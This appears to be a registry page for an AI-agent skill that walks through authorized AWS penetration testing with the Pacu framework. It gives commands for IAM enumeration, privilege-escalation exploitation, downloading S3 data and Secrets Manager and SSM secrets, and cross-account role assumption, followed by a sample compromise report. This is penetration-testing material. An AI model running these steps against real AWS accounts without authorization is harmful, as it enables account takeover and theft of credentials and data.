Performing authorized AWS penetration testing using Pacu, the open-source AWS exploitation framework, to enumerate IAM configurations, discover privilege escalation paths, test credential harvesting, and validate security controls through systematic attack simulation.
Works with
AI-first code editor with Composer
Before installing skills in Cursor, ensure your development environment meets these requirements:
node --versionperforming-cloud-penetration-testing-with-pacuExecute the skills CLI command in your project's root directory to begin installation:
Fetches performing-cloud-penetration-testing-with-pacu from mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.
The CLI shows a list of agents. Use arrow keys and space to select Cursor:
Confirm successful installation by checking the skill directory location:
Restart Cursor to activate performing-cloud-penetration-testing-with-pacu. Access via /performing-cloud-penetration-testing-with-pacu in your agent's command palette.
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Submit your Claude Code skill and start earning
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
0
total installs
0
this week
8.6K
GitHub stars
0
upvotes
Run in your terminal
0
installs
0
this week
8.6K
stars
| name | performing-cloud-penetration-testing-with-pacu |
| description | 'Performing authorized AWS penetration testing using Pacu, the open-source AWS exploitation framework, to enumerate IAM configurations, discover privilege escalation paths, test credential harvesting, and validate security controls through systematic attack simulation. ' |
| domain | cybersecurity |
| subdomain | cloud-security |
| tags | - cloud-security - aws - pacu - penetration-testing - offensive-security - iam-exploitation |
| version | '1.0' |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | - PR.IR-01 - ID.AM-08 - GV.SC-06 - DE.CM-01 |
Do not use for unauthorized testing of any AWS account, for testing AWS infrastructure itself (covered by shared responsibility), for DDoS or volumetric attacks without AWS approval, or for production account testing without explicit authorization and breakglass procedures.
pip install pacu)Set up a Pacu session with the test credentials and define the engagement scope.
# Install Pacu
pip install pacu
# Start Pacu
pacu
# Create a new session for the engagement
Pacu > set_keys --key-alias pentest-target
# Enter Access Key ID: AKIA...
# Enter Secret Access Key: ...
# Verify identity
Pacu > whoami
# Review available modules
Pacu > list
Pacu > search iam
Pacu > search ec2
Pacu > search s3
Run IAM enumeration modules to map users, roles, policies, and group memberships.
# Comprehensive IAM enumeration
Pacu > run iam__enum_users_roles_policies_groups
# Enumerate detailed permissions for the current principal
Pacu > run iam__enum_permissions
# Enumerate account authorization details (requires iam:GetAccountAuthorizationDetails)
Pacu > run iam__get_credential_report
# Enumerate role trust policies for cross-account access
Pacu > run iam__enum_roles
# Check current session data
Pacu > data iam
Use Pacu's privilege escalation scanner to identify all exploitable escalation vectors.
# Run the privilege escalation scanner
Pacu > run iam__privesc_scan
# The scanner tests for 21+ escalation methods:
# Method 1: iam:CreatePolicyVersion
# Method 2: iam:SetDefaultPolicyVersion
# Method 3: iam:PassRole + ec2:RunInstances
# Method 4: iam:PassRole + lambda:CreateFunction + lambda:InvokeFunction
# Method 5: iam:PassRole + lambda:CreateFunction + lambda:CreateEventSourceMapping
# Method 6: iam:PassRole + glue:CreateDevEndpoint
# Method 7: iam:PassRole + cloudformation:CreateStack
# Method 8: iam:PassRole + datapipeline:CreatePipeline
# Method 9: iam:CreateAccessKey
# Method 10: iam:CreateLoginProfile
# Method 11: iam:UpdateLoginProfile
# Method 12: iam:AttachUserPolicy
# Method 13: iam:AttachGroupPolicy
# Method 14: iam:AttachRolePolicy
# Method 15: iam:PutUserPolicy
# Method 16: iam:PutGroupPolicy
# Method 17: iam:PutRolePolicy
# Method 18: iam:AddUserToGroup
# Method 19: iam:UpdateAssumeRolePolicy
# Method 20: sts:AssumeRole
# Method 21: lambda:UpdateFunctionCode
# If escalation paths found, attempt exploitation
Pacu > run iam__privesc_scan --escalate
Discover accessible data stores including S3, DynamoDB, RDS, and Secrets Manager.
# Enumerate S3 buckets
Pacu > run s3__bucket_finder
# Download S3 bucket data for analysis
Pacu > run s3__download_bucket --bucket target-bucket --dl-names
# Enumerate EC2 instances and extract user data
Pacu > run ec2__enum
Pacu > run ec2__download_userdata
# Enumerate Lambda functions and check for secrets in environment variables
Pacu > run lambda__enum
# Enumerate Secrets Manager
Pacu > run secretsmanager__enum
# Enumerate SSM parameters (often contain secrets)
Pacu > run ssm__download_parameters
# Check for exposed EBS snapshots
Pacu > run ebs__enum_snapshots_unauth
Evaluate cross-account access, service exploitation, and persistence mechanisms.
# Test cross-account role assumption
Pacu > run sts__assume_role --role-arn arn:aws:iam::TARGET:role/CrossAccountRole
# Enumerate Lambda for code execution opportunities
Pacu > run lambda__enum
# If lambda:UpdateFunctionCode permission exists, could inject code
# Test EC2 instance connect for lateral movement
Pacu > run ec2__enum
# Check for instances with instance profiles that have broader permissions
# Check for CodeBuild projects (potential credential access)
Pacu > run codebuild__enum
# Enumerate ECS/Fargate for container-based lateral movement
Pacu > run ecs__enum
# Export all discovered data
Pacu > data all
Review whether security controls detected the testing activities and compile findings.
# Check GuardDuty findings generated during testing
aws guardduty list-findings \
--detector-id $(aws guardduty list-detectors --query 'DetectorIds[0]' --output text) \
--finding-criteria '{
"Criterion": {
"updatedAt": {"GreaterThanOrEqual": ENGAGEMENT_START_EPOCH}
}
}' --output json
# Check Security Hub findings
aws securityhub get-findings \
--filters '{
"CreatedAt": [{"Start": "ENGAGEMENT_START_ISO", "End": "ENGAGEMENT_END_ISO"}]
}'
# Export Pacu session data for reporting
Pacu > export_keys --all
Pacu > data all > pacu-session-export.json
# Clean up any test artifacts created during assessment
aws iam delete-user --user-name pacu-test-user 2>/dev/null
aws iam delete-access-key --user-name pacu-test-user --access-key-id AKIA... 2>/dev/null
| Term | Definition |
|---|---|
| Pacu | Open-source AWS exploitation framework maintained by Rhino Security Labs, providing modular attack capabilities for authorized penetration testing |
| Privilege Escalation Scan | Automated analysis of IAM policies to identify known methods for elevating permissions from limited access to administrative control |
| iam:PassRole | Critical IAM action allowing a principal to assign roles to AWS services, enabling indirect privilege escalation through Lambda, EC2, or Glue |
| Cross-Account Role Assumption | Using sts:AssumeRole to obtain temporary credentials in another AWS account through trust policy configurations |
| Rules of Engagement | Documented agreement defining the scope, methods, timing, and boundaries of a penetration testing engagement |
| Post-Exploitation | Activities performed after initial access to demonstrate impact, including data access, lateral movement, and persistence establishment |
Context: A red team exercise simulates a scenario where an attacker obtains a developer's AWS access key from a leaked repository. The goal is to determine the maximum impact achievable from this starting point.
Approach:
whoami to confirm identityiam__enum_permissions to map the developer's effective permissionsiam__privesc_scan to identify escalation paths from developer to adminiam:PassRole + lambda:CreateFunction, creating a Lambda with an admin rolePitfalls: Pacu modules can be noisy and generate many API calls in a short time. GuardDuty may trigger Recon:IAMUser/MaliciousIPCaller findings from the tester's IP. Coordinate with the SOC team to whitelist the testing IP or establish a clear communication channel to distinguish testing from real attacks. Always clean up persistence artifacts after testing.
AWS Penetration Test Report (Pacu)
=====================================
Target Account: 123456789012
Engagement Period: 2026-02-20 to 2026-02-23
Starting Credentials: Developer role (read-only S3, Lambda invoke)
Authorization: Signed ROE document #PT-2026-015
ATTACK PATH SUMMARY:
Starting access: S3 read-only, Lambda invoke
Maximum access achieved: AdministratorAccess (full account compromise)
Time to admin: 47 minutes
Detection by GuardDuty: Yes (after 12 minutes)
Detection by Security Hub: Yes (after 18 minutes)
SOC response time: 45 minutes (missed the escalation window)
PACU MODULES EXECUTED:
iam__enum_users_roles_policies_groups: SUCCESS
iam__enum_permissions: SUCCESS
iam__privesc_scan: 3 escalation paths found
s3__download_bucket: 4 buckets accessed
lambda__enum: 12 functions enumerated
secretsmanager__enum: 8 secrets retrieved
ESCALATION PATHS EXPLOITED:
[1] iam:PassRole + lambda:CreateFunction -> AdminRole (CRITICAL)
[2] sts:AssumeRole -> CrossAccountProdRole (HIGH)
[3] iam:CreatePolicyVersion on dev-policy (CRITICAL)
DATA ACCESSED:
S3 objects downloaded: 1,247 files (2.3 GB)
Secrets Manager values: 8 secrets including DB credentials
SSM parameters: 23 parameters including API keys
DETECTION RESULTS:
GuardDuty findings generated: 7
Security Hub findings: 12
Custom CloudWatch alarms triggered: 3
SOC acknowledged: Yes (45 min response)
RECOMMENDATIONS:
1. Apply permission boundaries to all developer roles
2. Remove iam:PassRole from non-admin principals
3. Reduce SOC response time to < 15 minutes for IAM escalation alerts
4. Implement SCP blocking iam:CreatePolicyVersion in non-admin OUs
Prerequisites
Time Estimate
15-45 minutes depending on use case complexity
Steps
Common Pitfalls
✓ Do
✗ Don't
💡 Pro Tips
✓ Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
mukul975/Anthropic-Cybersecurity-Skills
Useful defaults in performing-cloud-penetration-testing-with-pacu — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
Registry listing for performing-cloud-penetration-testing-with-pacu matched our evaluation — installs cleanly and behaves as described in the markdown.
performing-cloud-penetration-testing-with-pacu is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
performing-cloud-penetration-testing-with-pacu reduced setup friction for our internal harness; good balance of opinion and flexibility.
Solid pick for teams standardizing on skills: performing-cloud-penetration-testing-with-pacu is focused, and the summary matches what you get after install.
We added performing-cloud-penetration-testing-with-pacu from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.
performing-cloud-penetration-testing-with-pacu is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
Useful defaults in performing-cloud-penetration-testing-with-pacu — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.
performing-cloud-penetration-testing-with-pacu fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
Keeps context tight: performing-cloud-penetration-testing-with-pacu is the kind of skill you can hand to a new teammate without a long onboarding doc.
showing 1-10 of 37